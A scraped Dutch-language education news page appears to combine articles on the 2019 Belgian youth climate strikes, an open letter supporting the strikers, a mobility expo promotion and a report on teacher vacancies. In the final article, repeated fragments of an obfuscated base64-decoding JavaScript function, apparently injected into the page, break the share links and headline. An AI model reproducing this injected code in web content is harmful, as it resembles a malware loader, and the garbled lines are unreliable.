Léés ook: Klimaatkennis van studenten lerarenopleiding blijkt beperkt. Resultaten van een enquête bij 430 studenten (2016)

Bron: MO, VWILLEM DE MAESENEER . 17 JANUARI 2019 © Belga

Drie deskundigen (Kris Peeters, Sara Van Dyck en Leo Van Broeck) formuleren concrete voorstellen om het klimaat leefbaar en de planeet in leven te houden (zie verder).

Met 12.500 waren ze vandaag in Brussel. Niemand kan hun oproep voor een daadkrachtig klimaat- en milieubeleid nog negeren. De jongeren wakkeren het debat aan, leggen beleidsmakers het vuur aan de schenen en doen generatiegenoten nadenken over hun eigen ecologische voetafdruk. Gisteren ontvingen viceminister-president Liesbeth Homans en minister van Leefmilieu Joke Schauvliege een delegatie van Youth for Climate, zoals de beweging van klimaatspijbelaars heet. Tijdens het gesprek van formuleerden de “brossers voor het bos” bewust nog geen concrete maatregelen: ‘Aangezien wij voornamelijk middelbare scholieren zijn beschikken we niet over uitgebreide expertise. Ons voornaamste agendapunt was dat de politiek het debat met klimaatexperts moet heropenen’, legt Ward Winters (17) uit. Hij maakte deel uit van de delegatie en vindt dat het huidige klimaatbeleid zijn limiet bereikt heeft. ‘Met Youth for Climate trokken we aan de alarmbel en we zijn blij dat die nu oorverdovend klinkt.’ Ward Winters Afgelopen zomer, dus lang voor er sprake was van het spijbelprotest, formuleerde Ward samen met klasgenoot Jonathan Keirse (de hoofdauteur) en enkele medestudenten al een uitgebreid en onderbouwd voorstel voor ‘een rechtvaardig fiscaal beleid met respect voor mens en milieu’. Beide ministers beloofden aan de jongeren dat het gesprek van woensdag opvolging krijgt en dat er verder overleg zal worden georganiseerd tussen hen, het beleid en klimaatexperts. ‘In dat geval zijn we zeker ook bereid om onze eigen ideeën naar voren te schuiven.’

Het Vlaams klimaatplan voor 2021-2030 blinkt uit in vaagheid. Zonder de doortastendheid (of is het verbetenheid?) van de spijbelende scholieren te onderschatten; onze klimaatministers durven op zich laten wachten als het gaat over het inlossen van beloftes. Herinner u de Vlaamse blokkering van de ambitieverhoging tijdens de klimaattop in Katowice. ‘We willen ons niet laten vastpinnen op cijfers, maar focussen op concrete maatregelen’, was toen de uitleg. Het Vlaams klimaatplan voor 2021-2030 blinkt echter uit in vaagheid. In afwachting van het opvolgingsgesprek laten we alvast drie deskundigen op vlak van respectievelijk mobiliteit (Kris Peeters), energie (Sara Van Dyck) en ruimtelijke ordening (Leo Van Broeck) aan het woord om enkele concrete voorstellen te formuleren die het klimaat leefbaar, en de planeet in leven houdt.

Mobiliteit eerlijker en rechtvaardiger verdelen

Kris Peeters, beter gekend als “de andere Kris Peeters” (de echte, zegt hij zelf) is een toonaangevende stem in het maatschappelijk debat rond mobiliteit. Hij is voormalig fietsambtenaar van de stad Antwerpen en won in 2016 de Moro Persoonlijkheidsprijs. Vandaag toert hij rond in de Benelux als onafhankelijk expert met lezingen en workshops over mobiliteitsverandering. Zijn twittergedrag is cassant en vol donkere humor, als hij zijn visie uiteenzet praat hij ernstig en gestructureerd. Kris Peeters ‘In het klimaatdebat gaat men er al te vaak vanuit dat we moeten inboeten op onze verplaatsingen. Als we het verstandig aanpakken kunnen we nochtans naar meer mobiliteit voor meer mensen gaan.’ Vandaag is er volgens Peeters een te grote ongelijkheid tussen de weggebruikers. Hij legt uit dat ons transportatiesysteem veel te autoafhankelijk is waardoor, naast de files en de CO2-uitstoot die dat genereert, onder andere armen, kinderen, ouderen en mensen met een beperking uitgesloten worden. ‘Onze auto’s zijn te groot, te snel en te zwaar’ Peeters pleit voor maatregelen die op korte termijn aantoonbare voordelen bieden voor de weggebruiker, en op lange termijn een gunstig effect heeft op het klimaat. ‘Je krijgt de mensen niet mee als je zaken gaat verbieden met als enige argument dat de volgende generatie daar de vruchten van zal plukken.’ Nabijheid is de beste mobiliteit ‘We moeten stoppen met winkelcentra, ziekenhuizen en scholen buiten de kernen te bouwen. Ook voor baanwinkels langs grote steenwegen mogen geen vergunningen meer uitgeschreven worden. Al die zaken vergroten de autoafhankelijkheid. Als duidelijk wordt dat bijvoorbeeld Uplace er niet komt, boeken we onmiddellijk winst doordat middenstanders in Vilvoorde en in Leuven opnieuw zullen investeren.’ Bovendien worden de afstanden kleiner en dus ook fietsbaar en wandelbaar. Daar is al een hele retoriek rond, we moeten het gewoon nog doen. De betonstop is op dat vlak een begin.’ Light and Safe (LISA) Cars in plaats van SUV’s ‘Onze auto’s zijn te groot, te snel en te zwaar. Ze stoten meer CO2 uit en er zijn meer grondstoffen nodig voor de fabricatie ervan. De zogenaamde LISA Cars hebben een veel kleinere klimaatimpact. Om die overgedimensioneerde wagens te ontmoedigen kunnen we een variant invoeren op de lage-emissiezones: als wagens een bepaald volume overschrijden mogen ze de stadscentra niet meer binnen.’ Fiets en openbaar vervoer op elkaar afstemmen ‘De elektrische fietsen geven mensen de mogelijkheid om tot op hogere leeftijd in heuvelachtige gebieden te fietsen, ook met zware lasten. Investeringen in fietssnelwegen en fietsenstallingen moeten ervoor zorgen dat je met een speedelec durft naar het station rijden en dat je hem daar durft achterlaten. Zo krijgt het openbaar vervoer een veel ruimer bedieningsgebied. Momenteel woont de gemiddelde treinreiziger in een straal van ongeveer drie kilometer rond het station, dat moet opgetrokken worden naar vijf à zeven kilometer. Het aantoonbaar voordeel op korte termijn daarbij zijn de gezondheidsvoordelen van fietsen en een grotere bewegingsvrijheid. De klimaatvoordelen zijn evident.’ De boodschap van Kris Peeters is duidelijk: Klimaatbeleid kan samengaan met een rechtvaardige herverdeling van de mobiliteit. Het gaat niet om revolutionaire veranderingen, maar haalbare maatregelen die ook op lokaal niveau kunnen toegepast worden.

Ruimtelijke orde: verdichten in plaats van verkavelen

Vlaams bouwmeester Leo Van Broeck studeerde naast architectuur ook filosofie. Dat is te merken aan de manier waarop hij naar de grote maatschappelijke uitdaging van de klimaatopwarming kijkt. Hij beheerst de dialectiek en doet aan systeemdenken; In plaats van het probleem te herleiden tot een simpele keten van oorzaak en gevolg heeft hij een holistische kijk op het grote geheel. En wat hij ziet maakt hem boos. Leo Van Broeck ‘Het grote probleem is niet klimaatopwarming, maar het feit dat we het planetaire ecosysteem aan het vermoorden zijn’, steekt hij van wal. ‘En dat heeft een aantal gevolgen waaronder uitstoot en opwarming, maar ook het verdwijnen van biodiversiteit en ecosystemen.’ Voor Van Broeck enkele concrete aanbevelingen wil doen, wil hij ten zeerste benadrukken dat de strijd tegen klimaatopwarming niet los kan gezien worden van het feit dat we op globaal vlak geen ruimte voor natuur meer overlaten. Volgens hem zal de strijd voor klimaatneutraliteit geen zoden aan de dijk brengen als we wereldwijd het bevolkingsaantal en onze economie niet in vraag stellen. ‘klimaatopwarming is maar één van de vele tientallen gevolgen van ons ruimtelijk wangedrag’ ‘klimaatopwarming is maar één van de vele tientallen gevolgen van ons ruimtelijk wangedrag.’ Hoe kunnen we in Vlaanderen alvast ruimtelijke orde in de chaos scheppen? Reële uitstoot van woning monitoren ‘Woningen krijgen een EPB-cijfer opgeplakt, maar dat wordt nadien niet gecontroleerd aan de teller. Zo kan je bij wijze van spreken elektrische radiatoren in een passiefwoning plaatsen en de hele winter met de ramen open stoken. Handhaving en controle van de reële uitstoot van woningen is cruciaal. En als die de EPB-waarde van de woning overstijgt moeten er boetes uitgeschreven worden.’ Stoppen met verkavelen ‘Als slecht gelegen gebouwen versleten zijn, moeten ze afgebroken worden en niet opnieuw verkaveld worden. Met de verhandelbare bouwrechten kan je de eigenaar op een beter gelegen plaats, in de kern, laten bouwen zonder waardeverlies. Maar dan mag enkel een rijwoning of appartement gezet worden, vrijstaande villa’s zijn geen optie meer. Zo moeten we streven naar verdichting: woongebieden van minstens 60 à 70 woningen per hectare.’ Collectief wonen versus individueel bouwen ‘We moeten afstappen van het individueel bouwen van woningen. Een klimaatvriendelijke autovloot ga je ook niet bereiken als iedereen zijn eigen auto mag ontwikkelen. Collectieve woongebieden van pakweg 120 wooneenheden kan je aansluiten op een warmtenet, wat veel efficiënter is dan een individuele verwarmingsketel per woning. Bovendien kan je dan gaan onderhandelen over de energieprijs. Zowel de overheid als de bouwsector moeten ervoor zorgen dat collectieve woonvormen het comfort van een vrijstaande verkavelingsvilla evenaren. Dat kan door meer bouwlagen te realiseren in ruil voor terrassen, collectieve ruimtes, een gezamenlijke barbecue, een daktuin of een speeltuin.’

Toen Leo Van Broeck aantrad als Vlaams Bouwmeester in 2016, vroeg hij zich in Terzake openlijk af wat er moest veranderen in de regelgeving om de burger mee te krijgen in het verhaal van verdichting en kernversterking. Vandaag ziet hij dat anders: ‘De geesten zijn gerijpt, maar de regulering is niet ver genoeg mee opgeschoven. De doelstellingen liggen vast, maar de beleidskaders om die te bereiken ontbreken. Zowel de klimaatmars als de spijbelende scholieren bewijzen dat de Vlaming klaar is voor meer dan wat de overheid nu op tafel legt.’ Groene energie-inspanningen opdrijven Sara Van Dyck is senior beleidsmedewerker energie bij Bond Beter Leefmilieu (BBL) en volgt het energiebeleid voor de milieubeweging al negen jaar op de voet. Dinsdag raakte bekend dat de Britse chemiegroep Ineos twee nieuwe fabrieken zal bouwen in Antwerpen. Die gaan grondstoffen produceren voor plastics en zullen daarbij gebruik maken van schaliegas, één van de meest vervuilende fossiele brandstoffen.

Sara Van Dyck Als Vlaanderen de Europese doelstelling wil halen van een zero-emissie tegen 2050 is dat volgens Sara Van Dyck een grote stap in de verkeerde richting. ‘De Vlaamse regering heeft helemaal geen duidelijke visie om de industrie te begeleiden naar koolstofneutraliteit.’ Een duidelijk stappenplan om dat te bereiken is volgens haar het belangrijkste hiaat in het Vlaamse energiebeleid. Maar ze kan nog enkele aanbevelingen formuleren. Grootschalig energierenovatieprogramma ‘Vorige week stond nog maar eens in de krant dat onze woningen bij de slechtst geïsoleerde van Europa horen. Een uitgebreid renovatieprogramma is absoluut cruciaal, en daarbij moeten we ook de fossiele brandstoffen uitfaseren. We moeten warmtenetwerken, aangedreven door warmtepompen in goed geïsoleerde huizen, stimuleren. Om dat mogelijk te maken is er een taks-shift nodig. In plaats van elektriciteit zwaar te belasten zoals vandaag het geval is, moeten de lasten liggen op fossiele brandstoffen.’

Faciliteer hernieuwbare energie

‘Terwijl een versnelling broodnodig is, zitten we momenteel met een vertraging van de groei in windenergie terwijl een versnelling broodnodig is. Dat komt omdat er nog te veel vermijdbare hindernissen zijn voor doorgedreven windenergieproductie. Aannemers lopen elkaar bijvoorbeeld voor de voeten, bij wijze van spreken. Er moet een duidelijk ruimtelijk plan komen voor de bouw van windturbines, waarbij omwonenden van in een vroeg stadium betrokken worden. Zij moeten ook de kans krijgen om te participeren in de uitbating ervan. Zo vergroot men het draagvlak voor windmolens nabij woongebieden. Windmolens veroorzaken nog steeds storingen bij de radars van de luchtverkeersleiding, daardoor is het onmogelijk om dichtbij luchthavens te bouwen, terwijl daar net veel ruimte is. Kleine aanpassingen in de software kunnen dat verhelpen. Op vlak van zonne-energie is het belangrijk dat er duidelijkheid komt over het wegvallen van de terugdraaiende teller, zodat het interessant blijft om de daken vol te leggen met zonnepanelen.’ ‘In plaats van elektriciteit zwaar te belasten zoals vandaag het geval is, moeten de lasten liggen op fossiele brandstoffen.’ Van Dyck vindt het vooral jammer dat Vlaanderen, ondanks dat we intekenen op de ambitieuze Europese doelstelling van klimaatneutraliteit, nauwelijks stappen onderneemt om die te bereiken. ‘Hoe de regering richting zal geven aan de nieuwe fabrieken van Ineos, zal duidelijk maken of het ons menens is in de strijd tegen de klimaatverandering’, besluit ze.

Aan de jeugd van tegenwoordig, laat 2019 het jaar van jullie volharding zijn Wat opvalt aan de aanbevelingen van de deskundigen is dat het merendeel noch disruptief, noch revolutionair is. Dat wijst er nogmaals op dat het gebrek aan klimaat- en milieuambitie vooral een gebrek aan politieke wil is. Zouden ministers Schauvliege en Homans tijdens het rondetafelgesprek met Youth for Climate tenminste erkend hebben dat hun beleid tot nu zich voornamelijk kenmerkte door traagheid en vaagheid? Ward Winters kan een lach niet onderdrukken als hij de vraag krijgt: ‘Er was een besef bij de ministers dat hun klimaatinspanningen moeten verbeteren, maar ze lieten blijken dat hun welwillendheid wordt afgeblokt door onder andere een gebrek aan budget en door Europese verordeningen.’ ‘Beste minister, het is uw taak om de context te veranderen!’ Ook het streven naar sociale rechtvaardigheid werd door de beleidsmakers beschreven als een rem op een doortastende klimaatpolitiek. ‘Minister Schauvliege vatte die factoren samen als “de realiteit” en “de context” ’, gaat hij verder. ‘Daarom vragen wij vanuit Youth for Climate aan de ministers: benut de expertise van klimaatdeskundigen uit alle sectoren voor de volle honderd procent! Het is uw taak om die “context” te veranderen, zodat er ruimte is voor een systeem dat zowel ecologisch, sociaal als economisch verantwoord is. Er is nood aan innovatie want momenteel zitten we vastgeroest in verouderde denkpatronen!’

Waar de discussie bij de eerste actie nog over spijbelen ging, komt klimaat vandaag op een overtuigende wijze op tafel. Jongeren nemen niet langer de vertragende houding van de politiek. Waar een maand geleden in Katowice Vlaanderen zich weinig ambitieus toonde, is dit alvast een stevig antwoord.

Voor scholen en leerkrachten alvast een nieuw gegeven om samen mee om te gaan. Een kans...


Bron: VRT-nieuws, 16/01/2019

Jongeren die vol energie voor idealen gaan en zich dan con­formeren: dramatisch. Beste jongeren: blijf rebelleren!

"Blijf ons alsjeblieft een geweten schoppen." Dat schrijft Warda El-Kaddouri in een open brief aan Anuna en Kyra, de initiatiefnemers van het klimaatprotest dat vandaag opnieuw plaatsvindt. Ze steekt hen ook een hart onder de riem, want de twee jonge meisjes kregen de voorbije week ook al heel wat kritiek over zich heen.

Warda El-KaddouriWarda El-Kaddouri is doctoraatsonderzoeker letterkunde aan de Universiteit Gent. Ze was VN-jongerenvertegenwoordiger van 2014 tot 2016 en schrijft columns over duurzaamheid. 

Beste Anuna en Kyra,


Beste "spijbeljongeren",

Vandaag vullen jullie opnieuw de Brusselse straten. Dit keer zijn jullie sterker: beter voorbereid, georganiseerd en beschermd – want na de vorige massale opkomst neemt de politie jullie wel serieus en is er begeleiding en toezicht voorzien. Jullie stelden een vraag waar iedereen ongemakkelijk van werd: “Waarom zouden we naar school blijven gaan als er geen toekomst meer voor ons is? Ze zeggen dat je naar school moet en moet studeren. Dat je al die wetenschap moet opnemen, maar dan zien we dat de politici alle wetenschap over het klimaat compleet negeren.” Auw. Jullie drukken daar waar het meest pijn doet en dan is de reactie vaak defensief. “Naïeve, kleine meisjes moeten nog leren”, zeggen de cynici, of “Eten jullie dan nog wel vlees en reizen jullie dan wel met de trein?” zeggen zij die zelf niet naar hun eigen consumptiegedrag durven kijken. Laten we niet eens beginnen over degenen die het probleem an sich ontkennen of relativeren.

We zijn vol lof over helden uit het verre verleden, tot ze hier in ons eigen midden opstaan

De mens is een vat vol tegenstrijdigheden. Iedereen zegt dat jongeren de toekomst zijn, maar wie gelooft dat eigenlijk nog echt? Wie luistert er naar hen wanneer die het precies daarover willen hebben? We willen – nee, eisen! – dat jongeren met innovatie en oplossingen komen, maar als ze dat doen, dan zeggen we: “Ah, nee, toch niet, dank u, maar we zijn eigenlijk te bang om te veranderen". En hier komt de grootste tegenstrijdigheid: we zijn vol lof over helden en heldinnen uit het verre verleden of in verre landen, we zijn zo trots op mensen die trouw blijven aan hun idealen en strijden voor het hoger doel… maar als diezelfde figuren in ons eigen midden opstaan en zeggen "Genoeg is genoeg", dan maken we ze klein en dan relativeren we het probleem dat ze aankaarten. 

Wat moeten jongeren doen om hun ongenoegen over de politieke klimaatslaap te uiten?

We vinden het allemaal maar een beetje irritant en vooral onpraktisch. “Spijbelen is niet de juiste methode”, zegt Vlaams minister voor Onderwijs Hilde Crevits (CD&V). Ik vraag me oprecht af wat dan wel de juiste methode is. Braafjes een brief schrijven naar het kabinet zodat die op een stoffige stapel belandt en over een paar weken beantwoord wordt met een "Wat goed van jullie" en "We zijn er mee bezig"-boodschap? Even serieus. Wat moeten jongeren – en zeker die zonder stemrecht – doen om hun ongenoegen over de politieke klimaatslaap te uiten? Een zitstaking houden op de speelplaats tijdens de lunchpauze of een lieve mars met ballonnen op een woensdagmiddag? Zodat de "grote mensen" massaal kunnen zeggen “Kijk eens, hoe schattig” om dan weer verder te gaan met de dagelijkse gang van zaken? Neen, dat is net niet wat jullie willen. Neen, dat is niet wat wij willen.

Jullie, lieve Anuna en Kyra, houden ons een spiegel voor en wat we zien, vinden we niet mooi. De negatieve reacties zijn een uiting van een diepe ontevredenheid over zichzelf. De mensen zien in jullie dezelfde eigen morele waarden weerspiegeld, maar ze worden tegelijk met hun neus op de feiten gedrukt. En dat is, dat hun eigen gedrag daar niet bij past. Om die reden zullen mensen jullie proberen te kleineren. Ze zullen het probleem relativeren of in vraag stellen. Of erger nog: ze zullen jullie verleiden om mee te doen. 

Ik zie veel jongeren vol energie beginnen met idealen en dan zie ik ze conformeren. Dat is dramatisch.

Ik zie veel jongeren vol energie beginnen met idealen en met een visie op een betere toekomst waar zij aan willen bijdragen. En dan zie ik ze conformeren. En dat is dramatisch. In de periode dat ik VN-jongerenvertegenwoordiger was voor de Vlaamse Jeugdraad, voelde ik me in mijn diepste binnenste vaak kwaad. Iedereen keek in onze richting om de meest complexe problemen van de eeuw op te lossen, zodat zij rustig konden verdergaan met wat ze altijd al deden. Maar wat mijn boosheid en verontwaardiging nog meer deed groeien dan het gedrag van zij die ik sowieso niet als mijn bondgenoten zag, was hoe snel jongeren meegingen in die status quo. De scherpe kritiek, de vernieuwende blik, de onafhankelijke geest. Allemaal – poef – foetsie. Het voelde als een mes in mijn rug. In de steek gelaten door mijn eigen medestrijders. 

Beste Anuna en Kyra, beste spijbeljongeren, als er iets is wat ik jullie met deze brief wil meegeven dan is het wel dit: geef niet op. Blijf ons alsjeblieft een geweten schoppen. Omarm die burgerlijke ongehoorzaamheid. Wees radicaal in je kritische vragen. Schop tegen de schenen van de machthebbers. Noem het een revolutie als je wil. Je zal tenminste kunnen zeggen dat je verdorie iets hebt gedaan. En beste jongeren elders in Vlaanderen, sluit jullie aan bij dit momentum en blijf vandaag weg van de schoolbanken. We got your back.

Léés ook: Kinderen in staking voor het klimaat


Wat? Ga gratis naar het #WeAreMobility Salon en maak op de stand van Zen Car in primeur kennis met het vernieuwde project Testrijders 
Waar? Paleis 10 van Brussels Expo 
Wanneer? 21 januari 2019 van 10:30 tot 22:00 

U bent ambtenaar of mandataris en actief op het vlak van mobiliteit, klimaat, duurzaamheid,....
Schrijf u hier in, wij bezorgen u een gratis toegangsticket

Meer info over Testrijders in Limburg 
Op de stand van Zen Car krijgt u informatie om het vernieuwde project Testrijders toe te lichten (Bond Beter Leefmilieu) of over de Roadshow rond electrisch autodelen. Op #WeAreMobility kunt u kennismaken met innovatieve en duurzame mobiliteitsontwikkelingen. 

De klimaatverandering tackelen: ook uw stad of gemeente kan hierin een belangrijke rol spelen.
Niet minder dan 41 Limburgse burgemeesters ondertekenden in 2018 het convenant voor Klimaat en Energie en engageerden zich om binnen 10 jaar de CO2-uitstoot alvast met 40 procent te verminderen.

De Vlaamse overheid streeft naar minstens één laadpaal en één elektrische deelauto in elke gemeente tegen 2020. 

 * Uw gratis ticket geeft u ook toegang tot de #BrusselsMotorShow
Het aantal tickets dat wij voorzien is gelimiteerd. De actie sluit af op woensdag 16 januari.

#WeAreMobility: de nieuwe mobiliteit, tentoongesteld in Paleis 10

De mobiliteit in grote stadscentra heeft een revolutie ondergaan. Steeds vaker worden de auto en het openbaar vervoer aangevuld met uitgekiende en praktische alternatieve mobiliteitsoplossingen zoals deelwagens en carsharing. Ook gedeelde fietsen en de intelligente combinatie van diverse vervoersmodi (comodaliteit) winnen aan succes. Bovendien gebruiken steeds meer pendelaars een elektrische step, hooverboard, eenwieler of ander vervoersmiddel om het laatste stuk van hun traject tot aan hun werkplaats snel en eenvoudig af te leggen.

In januari 2018 wijdde de Brussels Motor Show voor het eerst een van zijn Paleizen aan de expo#WeAreMobility. Vier dagen lang werden alle facetten van de micromobiliteit en gedeelde mobiliteit er met enthousiasme voorgesteld aan bijna 36.000 nieuwsgierigen, die dit Paleis aandeden. FEBIAC, dat meer dan ooit vastbesloten is om deze vorm van aanvullende mobiliteit te promoten, heeft daartoe al een nieuwe #WeAreMobility-sectie in het leven geroepen, die gelijk werd gesteld aan de andere historische secties van de Federatie. In de marge van de Brussels Motor Show organiseert de Federatie van 18 tot en met 21 januari ook opnieuw het salon #WeAreMobility in Paleis 10.

Daar worden de allernieuwste oplossingen op het gebied van stadsmobiliteit, micromobiliteit, gecombineerd vervoer en apps voorgesteld op vier verschillende assen:

 • Gedeelde mobiliteit: mobility as a service, station based, free floating cars / e-cars / scooters / e-scooters, enz.
 • Stadsmobiliteit: soft mobility, e-mobility, openbaar vervoer, infrastructuur (rijstroken, stadsmeubilair, enz.), impact van drones & leveringen, enz.
 • Services: verzekering & juridisch, bank & leasing, energie / laden / dockingstations, voorspellend onderhoud, 3D-printing, enz.
 • Dream the Futureautonoom transport, luchtmobiliteit, smart cities, infrastructuur, Internet of Things (IoT), nieuwe materialen, nieuwe brandstoffen & EV, VR / AR / MR, R&D, beyond vision, enz.Bezoekers krijgen niet alleen een voorstelling van toepassingen en voertuigen die vandaag reeds de stadsmobiliteit vergemakkelijken maar kunnen op de speciaal daartoe voorziene piste ook kennismaken met de voertuigen die op het #WeAreMobility-salon worden voorgesteld. Ook wordt er een Mobility Bootik geplaatst, waar mobiliteitsambassadeurs een antwoord zullen bieden op de vragen en onzekerheden van de bezoekers betreffende nieuwe mobiliteitsoplossingen.


Op maandag 21 januari vindt de conferentie “We Are Mobility- Inspiring Talks” plaats rond de kernthema’sdie #WeAreMobility ter harte gaan. Deze lezingen richten zich op een gespecialiseerd vakpubliek; u vindt er elders in dit persdossier meer informatie over.

De toegang tot het salon #WeAreMobility en de bijbehorende animatie is inbegrepen in het standaardticket voor de Brussels Motor Show.

Lokale overheden kunnen voor de toegang tot het salon een gratis toegangskaart aanvragen via werkenbijdeoverheid.be.

Reacties uitgeschakeld voor Bijna 1.500 openstaande vacatures voor leerkrachten in Vlaanderen

Bijna 1.500 openstaande vacatures voor leerkrachten in Vlaanderen

Door | 5 januari 2019 | Nieuws

Bron: De Standaard, 5/01/2019

Vandaag om 15:46 door pvm | Bron: BELGAfunction oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20190105_04081874#">function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20190105_04081874#"> Tweetfunction oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20190105_04081874#"> Delenfunction oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/mail/dmf20190105_04081874">Mailfunction oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20190105_04081874#">Print

Bijna 1.500 opensta<script type=function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndande vacatures voor leerkrachten in Vlaanderen"/>
Foto: Photo News

Er is een groot tekort aan leerkrachten in Vlaanderen. Momenteel zijn er maar liefst 1.500 openstaande vacatures in het onderwijs. Dat zijn er dubbel zoveel als tijdens dezelfde periode vorig jaar. Dat blijkt uit cijfers die VTM Nieuws heeft opgevraagd.

Het lerarentekort in Vlaanderen is niet nieuw, en dreigt de komende jaren nog nijpender te worden. Zo moet Vlaanderen tegen 2024 jaarlijks op zoek naar zo’n 5.000 tot 7.000 leerkrachten. Intussen staat het aantal openstaande vacatures op bijna 1.500, meer bepaald 453 in het basisonderwijs en 971 in het secundair onderwijs.

Lieven Boeve, directeur-generaal van Katholiek Onderwijs Vlaanderen, ziet verschillende mogelijke oorzaken van het hoge aantal openstaande vacatures. ‘Er zijn meer leerlingen, dus er zijn ook meer leraren nodig. Ten tweede zien we de lerarenopleidingen stagneren. Er komen dus geen extra leerkrachten bij. Ten derde trekt de economie aan, dus zijn er naast het onderwijs veel werkkansen’, aldus Boeve aan VTM Nieuws.

Minister van Onderwijs Hilde Crevits (CD&V) plant in 2019 een campagne om de positieve kanten van het onderwijs in de kijker te zetten in de hoop zo meer mensen te stimuleren om leerkracht te worden. ‘Er moeten voldoende leerkrachten zijn die bereid zijn om les te geven en die ook graag les geven. Gelukkig studeren er elk jaar nog veel leerkrachten af, maar zeker in STEM-richtingen is er een tekort. Dat we het nu in de vernieuwde lerarenopleiding mogelijk maken om vanaf je eerste jaar aan de universiteit te kiezen om leraar te worden, zal hopelijk jongeren stimuleren om ook voor het beroep van leerkracht te kiezen’, aldus Crevits.

Aantrekkelijkheid beroep

